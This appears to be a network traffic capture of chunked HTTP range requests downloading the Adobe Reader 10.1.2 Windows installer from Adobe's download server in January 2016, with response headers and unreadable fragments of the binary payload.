Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=38797312-39845887

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:58 GMT

Content-Range: bytes 38797312-39845887/53784984

Content-Length: 1048576

Connection: keep-alive
.....jO..!...H.......R.....Id.>...D.[...d.l^...........X.!if..f.T..
....nr.../...IV........C..... [email protected].,.XC...%....
#.....fU....og.....4...w...6re...K.k..8.c;s.....T..C..|.;#<#G..2..9
.)...h.<..D. J.8................`..J..N....1Kp.....>Yhr.j.I.|..X
..b.`(.(..].... .;...5.g..LHu..3..-......7.....P...I.Qq..nBa....... ..
.....!@.(.K.P.k...'k....4.V.j..W..mx...E.i..~?..l.6..Mg^......dz{.E.H.
...8.I......`.....F..K......b.R...T.....V.X...}..7.=w.5Y.'...(2.R...R.
[email protected]...&.t..Y.[.G..._...>'..:...P..~^......7V=(.X....b..
C7.o/..=.L.P...]....j..F..|'.....:^.......V;p...E.}cZ6...B.o..E/....$.
..<...R..ro.Q.4.d...{O.....].a......~...8fP...i.P..B.7~1qN./1.s6..t
....`$....:[email protected]....... [email protected]$.r.C. R.'.....x\1...
...$.S..Z...>........Aj.&....J..I..4...[....:..v.....(...(.X.n..E.b
.0N..;...BDO.Dv...>4.t....$.].S..W..}..4........~..]./H. ..j{[email protected]
5.|.kx.........".>....]!P.k~..d...>.nK...h...Vw....%..65.sv.e...
...@..`|~.....-..f.!..b.u(. 3..9..J....v..-.a|.O............d.E. sJi..
...._U.[e.......x...~..$Gwa..K.x.l<s%.m...p..Z..........!C...[.....
..P..N......_..Y....u...E.5YA....?.H..[.2.........T...z....G.#...H>
K.#A_.r.5..sm:..fjP...s!h(.5ab..?.L....R.U....MF.Z..:h...X7~..........
MAd..RP\..8.6..........R.d.....i.X./.$Q.....u.....h...v|#7.'*sV....b. 
..#..7.?..!..'829.T...g.R...>....B.3..[...,C.X..s.sy.....h..I..t...
[email protected]....&....ng. ls.]J.........,x..d....X.C2V?.F. 2..d .7R.L. W ...2..
......J..Y.1..q.o.M..u.].u..a...A......Jn2m....*....v.w.E..U.=....
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=39845888-40894463

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:58 GMT

Content-Range: bytes 39845888-40894463/53784984

Content-Length: 1048576

Connection: keep-alive
O#*~...S......b..5?.(.=Ic>.G..&._..Ik{f...M...8...].G5....'o...3.d.
O..........k<.4.._..v.J.w......P0........ifZ1.{...1.f@.].6......A..
....id......_.......m.P2/........ ..[..3..F....5..XQ.D.P.4-...a.V..Q .
...2"p..x.......l...g.vf.H~4..:...Qf..LK.n...kd.>I|.~.U.....I......
[email protected]@...~.!....d.w..,...m.... ..9..x........^I..[9....
.]..J.....rq. x.Q....>.%..m1v.n.Sd.....$.Y.=l4bn...K.X&......P.....
......./2".D.....WB....%:/W..".F29.nF. ..aR..C;.2....VA......ug!.. ..6
.....7=k.]...0...I....29,.3..Cw.....[..G..(.......s$.......v..........
6.......r......}...^...~R-g.A.5}w.jl..>RG...UG..s..(.!o......z ..O2
...7..tr.9.q...-8...._r7.f^.B...).(..)...N...x.....]..L.x".*..B.U....P
....h|(...Q...5..]&^...IM..u.c.........8..."..~G...Q.n.JC..A.$H.u...Y.
N...^..T[.R...$\..x...D.g........L.|.:.4w.7..R.X......Y.....'.S#?ht.h.
.K.yn.......8{%.J{..,.Y?.....G.....B.a......f....r.....L.....e8.N..6..
........S..x.P.]...?.5..j....#.......UN.x..v....T(.r...eu.8.i..F..(.e.
LG.5Vp.......0.b3.zE9............n.H...|.........C|I..Cn..}...>....
..4...GW.......g.z\.[Q.uF\.O.(..v.Y.S........2Q...2........o...;.....A
...x.C.-...DQ=RF/P..(1(J`...?.l......B0.x.(........{,.n78...`BKyg.R.).
..k...^.......2..M]%@[email protected]^0.|.L..u5q<..t..
.;.K....".Y$..18.....4.........e..*....zy..H..)._ .0.R....]. ....n.._&
lt;q..K...0...!....V........Q.8!....S..H.S.Cc...C....H.D......m..=>
w.....p&.0...h6..p,.(|C..#E.?4........"...}.....=kjC7.......M.$.G33...
,..D..........v...&3......5*.)..W...8-K.\i...xb...~......h,.......
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=40894464-41943039

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:58 GMT

Content-Range: bytes 40894464-41943039/53784984

Content-Length: 1048576

Connection: keep-alive
....4..(d.J.Y{..L3.Y.ot..f.O..P{.c..QZNwp.r.Gc.>[email protected]@o.4.0Iu".
...3.B...l!...61.5N..@..~....>......L.%.0..m[W5.K5...]... g....{..a
..........`./6z.^..:[email protected]..:..Q|.._y:q................
Q=.i..&.....hC.w...u........0.....y.M...s"p....s.B5u)g..t5&5c...q...w.
....%..*.%..[..@....)R..y.)oci.g..QW....#E.....8.y.:...z..I.P...=..t..
..G{.a..5xD.&....= .I....Qi........G.....2.mA.Hq./.a...Pe.'..a.....k.i
..M.B.S...X..x.q..p %c~B......-......p.W......K.V..3`[email protected].....{{m
.d$Ak.|d........k.. .^Cp.."...0.&..7..bV..JV..^.......O...N....J..0O.e
[email protected]..:l.S..v^.....zK.i[..:G...5..E.(...e[[email protected].}...
....<am3E<I...6P..y.<.t.a..x*.j..9*../4..^.j.h..q.....n.'.U..
%.6E....6G!8'...O;m......3.....k?......O|..W..#..7........].w&:.(..0X.
.......i.'.....0...."p....}7....($.s..V..d.......&?A....Zj...^.}8...1.
7c....O..\)..dr..".R.`..LK..3...W8.b..h..!rC.lI./...f...29.1.....,o...
i..H.......o...t.YrN.../...?....Tc..7...Jh?...hQ.lu..H.........0.....Q
YF...:.G....... ....^.G...@.......&.|....p..Y>..C.P..F....z...9`(.t
......4..........9...(..V.......x.q;.2B...Ez....D.... ...O.....-.L.[q.
........ x..?..A.......;Cb..e...v0..../...0{......8.o.Bfq?..1B.Z..P...
.Rt.........(Y.............D.x....[....................=.. .`5...i....
.n.E.....*.j-l...2....z0l...7O........U3..KS.) .ys..9%..Wx.Z......... 
5.......6..... ...D...e..r.)......f....>..`.!B...AT.NWGf...T...c;p.
}.J......97....l.Pa*^w'!....-..s c.s...k.:.|/r*.......!6..4...2....^.O
wlz..7.r.....u..qS...A....{.$d.^...m)f.!o.5..j.fp..6...9m.J.61...M
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=41943040-42991615

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:58 GMT

Content-Range: bytes 41943040-42991615/53784984

Content-Length: 1048576

Connection: keep-alive
.......}..>.1.l.....l\..G.0?.=......!J*..b.5.4.-..L....J...J..hT..:
YC\%RfCI..p..A..md..f....6..[..^.Zor....s;o.p..s..N*a;..Z...C?.'.O....
 ...u `Dx O..Q...id.f'`._........U...5...]....u..w.3.._.M.....T.&..-ls
..S].m;....kB...|m.Y...hl-.....b..CF1...2..;.*Q......4E..q....Q1.f..#.
...k........@......|.W0...'...t.!.q.;...[N].....XQ.Z.G..Qio.|...[.1H..
.?O...nR....".v=yW)^.EZ...6...$.....;41o....z....W...x.>.".........
.r.=T..A>...%#GV.1....>j....rnI_.:C...T:..fh..)b...B...*.t.....j
... .~............e..MgRzHW.D#...m....8..xl..}!#.q.....@##...i.a.t.06^
.&-...*'v....YH.N.. 1.=F.M.....)..d...l%....uduspNj...........B/.If*2G
........=.....[.KV...s5._o.HyP..`..<-V.p.NI....{b...p.....L....0./.
..V......f.4ID../.;!...x(pV...f.....?zK.....hG...W.....g..[.8......F..
...J...Vn...#3...S.6V..A.OcY...N.)[email protected]".w.RZ...P.UU....~......v.
g.....Z...>$ .......q=.Y6]..Y...W.!...<LyF..~...YE..K~R...~F ...
./....c.f....Lyfz..i....,*.6.....h.~P...e.J....4.....[)......m.....`.~
..:...}>.H.q.-3..&Qh...Us.......5/..p..M8'..35|...E.V.\6=...;(....i
#xX..9H;R.0...pH...{.q.f....H.M.u).|.e.......a...#..svJ.u...K.....d..F
\..$W.`I.#...]1........@*.._t#.....z..r..7....\V5....{....<fF...4.'
o.... (...y.%i......(.g..9...W...UM4...q.#t.E...(.....H....qWOe..C.T..
C....%....9d..(....P..pz.........=HT=...4...J.}....R..J.r.Q..A. .b*...
....o.r......F.!6....`[email protected]..[.R.w.1^....I.%R..U
.\;7..8...w......D\.....>.l...e._.?.e...:..W.X.t.$a..cX...%....2G.{
..$.....m.._.I...{......{..I...r.*S...Y.4...}........nH....Rv.@..^
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=42991616-44040191

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:59 GMT

Content-Range: bytes 42991616-44040191/53784984

Content-Length: 1048576

Connection: keep-alive
xM.1#..`.Z...G...f:......N..X75...I....8..{....U..:..C3..vj.../.E.h...
[email protected]....`;@e}Q..Q..hQ|.N.......1Y.Y...@......$.i.Z...t...)....."..vQ
..c...B.~.. $.Q.}q:..6...%......>x.,V..U..u.x........M...z..uy.}.5.
....~.5..!.....0{7m...M.t...m.0&boHP,....b.b.....`.Ig.v4?..#.T..b.....
...'....M.....L.i.hV.q.. s...rw0.T.f`...6.....P.)....2..Pd. ..3.....:.
ty...WZ..x....?AiF?.;. ........e#.x|...z.o<....h..D.ZI...c........O
......o....w........>.QO.K....%#.....:*&.V...A<.k. ..#}.}....A..
.$D...q`............%.Y..e.vQ6.6R.w1...pH...f.`........?y...s.c(a.8...
....m...(_&..A_...|.I........Js..QT.6....~...Z...AA.|....K$...........
.....E.....`.as.........0....T....S`aZ.....W.h..yaN..w*..b3P.Z.xxq....
)O....}G.{,.d.*s$./.Dco#33...?n...J...Z}.*p.M.E..e...E4S`...m.{.......
...B.2...v.Z.......8......fB...pS.~?../ "..N.....\..u.X.....}....W...L
.....U.n........-l#.]l.j.._......?V...K.^..h$..j.f.}..<Y.3....t...B
."Q%,.w..;.X...6.....3;..hF.v{.Bm.jI..4r..8G.I.....%b..L..U.W.."..3.[.
.>-..J...7.>K.*.pF..'.t.... ...h..h>...`.H?(mf....{9..X}.... 
*...&V.....z...,........<.........g.hT2.[..;.G.9P.G.L.,wV.[..w.R~.^
.{.yC.N .BkA.{.OU.k....\....................IL.E.E.I.L..@Rh..>TM...
. .l%.>D.|..mO..M..<..=.z..&......$s..Y.......u.l..E...Z^.Q..w.G
. [email protected]..@.>9N..4.Yv...;D..j!N........"_......7...h
..jN..NhC.....,.a.E.Kdy<w1.m.......vM.y......g.y.T.X.....L.J.)...\4
L..YAQ.:k.........;..Z.G.$.K...[|...........42... .6..zZ..]....w......
.)..W7...j..:...w.*(P..s.s.d.r....b8Za..K....P..Q...X....>..7a*
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=44040192-45088767

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:59 GMT

Content-Range: bytes 44040192-45088767/53784984

Content-Length: 1048576

Connection: keep-alive
.BA..6..W.........#3.n.<p./.z..........Aw.?.PL..R.......vz...... DL
.%b..d..$....i.Q....N.L..su...v.3&"4...h ....~...'..P..C^.......[.c. l
6...f>d.tP.....(6cf.=..0V......1e..&......J.G.....K.....?.E.%.:rB..
530..X......_..za[.\V..vxV.......o_...q.(0SNsO&....b.Y.^]m6..Z.6....6.
.....(.* ....C..m..5...>.Z.\5B....X3-9.p.N...,...._j..4eE.....g./.x
...:a.Z1....c..s<..E~..(hJ}.S..H>~....{R.... Rw.4...r.6.K..$....
......1.MUE...^ ?..R.H...n.6...x.....d$2}Y..N.....e.j.y....#Z. ...9...
..~.....Jw..x.5Ko....).&iE.9J)...wJ...H.5.W.....4.....I.q_......d....1
 Qy.L0$L.3!FCS.... .Y..t ;.....^...Z%".,!..KdNQca.jK#^s.8....Gb. .._..
..ax...i....$.?.".ft.....E.e.)q...E..z..i.0.....5.6.D?.....%.$wQ.V.M..
...&..|.k]...^_ ./k.173......t..I..P......s.. ..../.u.....9.......,...
.......#[email protected]..=.Z^..O........{ ..9....p........ct%sV..1...
[email protected]...].j.2.L..|.<...4.I:t.....}L8..,..J.&WO........
`.o...I0.../........'&..n...KV.Y..J_M.}.U.B.}>g......~.=F.......?..
7N...y|...M.._.w......8GnD...9b.c.v .F..;.%?..C.F"<...0........Z.1.
i[..-....v}..B......<=...|..(...2....S. .U1. .....W,...o_5.Gs'<.
.2^:G..lp2....n ES.C.D.. <~.:.]..Vx.5/..2.M...spWMvo.s^.......L.u.\
(...Q=5\.t..!N~I..L.....z..._./.4Q....].s......].u... .H....r..=*...~.
&..E..H....Q.X..6..V.I.C....M..I.8 |5"...d.:. ...-N..':."....B..2N/7&g
t;."~....J..,............b....q....6p......w./.X.........Kt.3-..-..\n.
........$...>.v.Q. ......r.......5.hk.P8.yt..S....l..J..t...Z9.....
.d.o.}..../ B.>.a.' ..N....Q<.:R......_.b...".T.....=...0.,.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=45088768-46137343

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:59 GMT

Content-Range: bytes 45088768-46137343/53784984

Content-Length: 1048576

Connection: keep-alive
d.:p..........S".B`..iS;...h ...w ).......UA..?..]r.L..\.Ml.ud.DL*..&B
....Qp.I.....:Pl.U..2..c..z8gf......C.3.......{..R..W.....pA..P..Vk.LX
......C...(R.l5..A...^..'y$.^....Tn...?s.H..^.m.1&....D5k.....f..D....
[email protected]..).{]].O.J..t..p..(*..-....). HX.G2S..NU.K........M...}.y..v...
..G\"\.z....C..:@4.......*..8..y.*....%..}..$....F..d3x.....,%zu...^.R
..\.?=.]..a..q.k....b..Q....p.v._S...Nh....4.....l....a'..-.mPE\X.V..u
..N..!u..~.#.{}....2~.Y O...*.R...?..:.l|Q.......g..x..\..ob..$&L...:U
a..3.......|Fp=3K.F.:.......Y,,.C..9xd|.S...Cdp..F.....z.|WQ`..7...^t.
........F.................5.............-..m8..M.YR.. . .;..y#o.f...|.
L.!..B..................V00.g..T..MHq!..I~..-..L.!.4...d.......&]..r..
.0*mN..[JR/...J.\... ..3.d..6..u....S....OYh..t` pYu...%..3...e.....JS
.....G?n.j...~9M...E.h...Z...n.......H..q%...!d..1...-.....1,..D.... .
..P...1...e.V.6........q&...~.r.[......s.e.........qr....mT}.Mn.....N!
9V.~2f.. R..I.z.........n;k.*\("#.7:.....8....'..kB.......--r......t.s
...Y.1..U.<...0.~!..h..nX.ED!.7_k[..4..... Hc.....7....p..k.<.A\
%D.(.q...^2.....;....6.>[email protected]..$6-..5.$...h...R......>.....%.2.%
...$..V...uG....Z;.k.Y\....:nG.Z....Mp.6..{.V...q.A..*...M.]:*:-^.n..E
l...j.mT.t.#..Y..>..........&.l.7........X1&.PS.#h....pq.....i.5@..
.4.nK.E.g{..Q.....YB*....5...CIp.....eD.LC...."....C6..>~m{...l....
.....2s.sH...9....c1.l......1.)....H.:....@iU.]s... .wp.s..[.\...eJ.Q\
.}[email protected]...@J.|im...F..Q&pE{|.La...$.t...W..Uq..X..
...8..|5.........P../=.....C}..B....I*....  ..wq.u..^&..H3n...z~..
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=46137344-47185919

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:59 GMT

Content-Range: bytes 46137344-47185919/53784984

Content-Length: 1048576

Connection: keep-alive
........c.. .F....vla...]}@.....W....x&0...>m....\.... ........B...
/..b@..#.02.F\.s...4.....O.!.....O...).5j.(]...6..ye.7...(X..J.j...l..
...x@4R..\1.,k:i9U.....]....7.}$.T.h.~....#...p....Jv.<6..."....y..
....,.=&?.....f!.5W}....(vgB.Z....g....b..-.c..D4d.K%.X..;...!...C.]..
...l..[ ....=-..e.J.....o...r9.k..%H.-.!.{....l.UT.VZ..=...pvG...^2..:
..X.j!m?..>.......U..25..'..3_..g.O.G......^s..C...............Vg..
.M.:.b... v.@.$UL.A.1.NT..3.z.i.OC.J.\.......s9{Q...;.......}..S...&..
.......L......|../m........h.A.0.l...;.........n..li.u...:.k.#Z..q...E
[email protected]..^....oH......>._.*|..koJ../[email protected]..&../..{2.
......G..2bK._..1c.H9P.w.KEt..._` i..Y0.Co...t]...!^t.h.{b,Vr.9&'iMEfZ
..4w\Y..H:.....d../.h.0q...t3..]...@W,k..=Y...V.....A.m..... O...M.P..
OB..K..........a.........\~..1.....c4Q...Yr....'.h.."nw....5RX.P.w&1..
..bdq.....M.TVK..2.K..&....2B...1...~.e...y[.T...._7:..~3".t...(......
..Z.GH.....3.......#W.e|;f.`..af....6Bo.ur2|.. ..5.o.;;.z.h....[....s.
.~......\X..N...v..;4......)G..-...Ik..V......4.Y~T.]IFE..J.m.Y...k...
.q.....I..f.q'.].]F.I.5....y.[..l-.?m.%.).........<]..V...?..T..L.7
.......e.V.U........p..'..oz..(..4...JK}.j........._.5h.[. E.!^.TfV.1f
......j.5`W.....` ..9.T...z9.........]...d^..$7L 8D5S...OCe.2.=H...N.a
x..}o..H*$.h......0L9N$Y.$......F....G..'t.i.c.;..h..(T....[xV....v/..
.A.#....E...V............TT...B.d\/.p.M0Va...'&.I.....t(...5......EI.b
|."...ib!w.....r.."......'.e.i..M..W.Q~.=.UF..&2...{t..0...&. 17....})
..*#."...c...K,w......F.(V.........F.#.d.E.p...j.Yw.KGs...dZ..A...
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=47185920-48234495

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:59 GMT

Content-Range: bytes 47185920-48234495/53784984

Content-Length: 1048576

Connection: keep-alive
......JV~.......x:.(..O0........Y.^.El..9l.f.......]...%....C.R......W
K......<...D-.>q|[email protected]'../O.....'D.....'M...?.V.2zo....d..w1..3
?.N....(d..fO<7.HZ.r..g.|.j.?.%.^..f.......9R.....OV..A..9....i....
.E.Y).C.B.3P.h..-.hj.Q..#....~.Dp}..Y......t.%t....=B.[....f..rC.V.B?.
JM...o....E..%...;.....z...z.J..Z..O.(...yLM...C...t...6..y;. ..~.....
Y.k.|..f"..Owy......>..n..Z.....#Q......=..&...3..9. 3...1C...G)..F
..#] ......i...Qn.B.1........._...}..Q!-...#(.j....,..H|X.i...".n...K.
......~...V..0r]JrR.\..C....4...C.o.p..v.....|nD..a]n.*i....lB....Hs0M
....l.l.r.D0.<..c.;dPxIB..`.^b.m.?F&....A.Ms..F.XE.......z..ux..`._
..F..2.z.l..VVh...T3oQ....H...w...;h.;[...r./.*....(....ZK8<.......
CKt...o..q.@@P....N9..Mz.1.':.kT(<.i.p....}.....1.yj.......c'/.....
&....G.......b.=..{...V.3......Fpo=.Y.gq................k..xT..=...ayu
..0m.[.K....K..N.z.....Z.[U#...C.H.....|.......K.i 6.Y.. [email protected]..
H..Z..j~.1.....0..6#......$uo...F........As.">*./.....1...N.4.a....
....&.mn.I.D.....y./.W....e.........Q!..yv..p2.Vp.g...n....a.z}Z`@.h.Z
B.:`2_....%A.0..]u.RD..>..8m..8.(.......a..../...\....c.N.L'.}a....
..S.I.a..#...O....~..$...._.....1.z.H.8'.......F...a...2... ......W.k.
h#.....9..c.(*....Kw/l ......n.'......s..8!c\..Z"UT(...^K9..G..\...M;.
*.Nh.V^a...._...z~.M)'o....a.aO.....>.r...X...$.....(.%.3..E./..^..
38......g...C..m...QL.....R......t.1.f.....;....4.^.... ...jK .F.B0...
..xM. ...3#........tE(...V- .......@..$....h.......7.SxO..#..=.;.....C
8...]...M...^[email protected]...<...m&... r[..%T...`9.e.kL.r*..t4........
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=48234496-49283071

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:39:00 GMT

Content-Range: bytes 48234496-49283071/53784984

Content-Length: 1048576

Connection: keep-alive
.&..H...... 8......1.'1q.T/p....j.].k.w.]...;.`....)....1.....O..V.../
..J.%..m..I.6..x&....it6..c .../\.8.....~/>7...z&c1.j........n..vc.
.(|.F..~.....$.;..F.5.(!.S9.U(....d.......HeD.$.,.....9 ..lhI/..i;?AB.
9.j0^\)w.#...J.[....f..P]..|..h:/....a.t...N.4....i.\.^*..aAV^FE......
o|v......;..1.y.*.le..\.....}{...c0.&>..(.=WB\D.,......H(j...Z..~..
..Q. Q_I.*V.!"A.[.i.|....^Z. ..(M..l..<.........3G....v....j^......
........ yA.re....N.C....R4@"{.....U.n....S...0.x.(k.o.}.PqEU.....W.H9
Z.\..Q.X. .n......l.........N..e2......A/|.0....!..V.7..........p.u.\.
. .35...VR...R...w'...H.89..K........T_...h....xur........8..$".....JL
..9..%O{P....B..&..~..H...M..g.`.....i.N..5..,...c...^B."....~ ].YD.M3
 .s...........!M..N..$I.e.Bn.L.x..,.?.....=..K.?I....F...6.........\$.
1Kn..`[email protected].... .3..6.n.....V...c.0.x.....W.[......'7....D..,
..^oz^...X.G<.p1.b.......Y.......Cy....43.5...4Y......._l....n\.'..
N..9...9c.2...lWX.c...l  .m.gT]..`..F....@./2...Eo.9....&m$A.r...s....
[email protected].|...4e..M..H4 .#o..y..uct.(...I..p....!..h..{.....H..N
.g8.....*.....J.^|.M.K.b.........r..#60...9....,.B.U.z.t.^&..../;T.q.z
..d>@.q.........a.._..<.5D...s.U .K.X..T..Z..PX.q!....F].b.vr.M.
.......T..Q...p.>..0.-..b.f.......y.8..b?.....:i7 ..L..'.w.Y.&3.-..
.eK...kR...#.gX4.*[d?)HA...y,.4.aS..Y..[.g.;n.H...f....6...=;j{....IM.
..W.i.JB.!g>...eW.....TQ<HD8..y.*......`..3....X.SuZ~_...$5.L9`.
..O..D...*.Yf...FD....Q..JK......!...(.W ..........,...:......l.x...=.
}.|....S#..O5F......N....p.. g......m...._&....#....a...=`.....D.4
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=50331648-51380223

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:39:00 GMT

Content-Range: bytes 50331648-51380223/53784984

Content-Length: 1048576

Connection: keep-alive
7..${w}........?...oc..2.c..|..)m`.2uC.R^Bn.&.U....../.A.4.....jne...4
B...2.i..}CB.8w.gnl.}..x.............pd..$L...X|@........m..Ag..k.....
.6...h......~..o...........S.....n.....a{]..<.....M......S.........
] ....i5]R..u.e.....F~."8...f..z. .&.)..=..7B..o.....x.h_.= . .f..fA.G
...L.=Kp..k..l...vM0Q.......>...4.?.....2.......p.<...a....a....
..F..K.(..........@.]z.....6./k_.";.<>.... .l^Y ......*K..w ....
'.a...{B.8....~.w..V#;...n!..46..Uy..7..&...H. ..%<......AG'..II...
.6x~.b.....{......{ ............z..k.kW.'L./0....c#..F..M.sKI..$..$(..
=O._].17...~)....Y...<9.t.y...8.........C.}.~...<./&...8.o(s.)Yo
....`..ct.w..Mg,3..N.........1..Ln...=...................".9.....M.r.F
..|..>._..n". ....?.n4Y4./}../.......;]m.EP/..T..`...{(..H.uu...e9;
.%.;..4.t..1...A...R....B.X_'.$.g....j.~.......6x........&,...6...b}..
.IlN.n^...!.........\..._..y0..n.....tP.i..|._.P.V..F..T.y.,...}k.....
*Jd.4\.s......d........"].2.n.....W.7.....m.o.b^.S....Wq0..0......'...
......>|.Pj.]...A.%c..2..!|..<~...k..lC5.u./.2.%]i..........p...
.k....)V......H.]2....J....Z/....X.FL..$...z4....../...g.Q..v.......Y.
.3.I....%)l.o..Zk,..=QUt..u.......`.../.J...:...Vv..0p..Q,bX9.j5......
..?....5.......j....Dfp.N.Z.{.....6_...(i.r............M..}u.....p.rS&
lt;[email protected]]..vvJ..d.>. &.L9....<..J.-.....^D....9wD..#.Y..".'
s.5..L...T&.`.....b.j.. '(4./.).........~.J.JQ.}O.y....O\..&r.....H...
s?l..W.m.......U/....*.m.a.i.6>.*......#.x.B*.|[email protected])..V.
...:5.......=..<=.L\.k..6....9.$...FZ..N....L0`sEb....,........
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

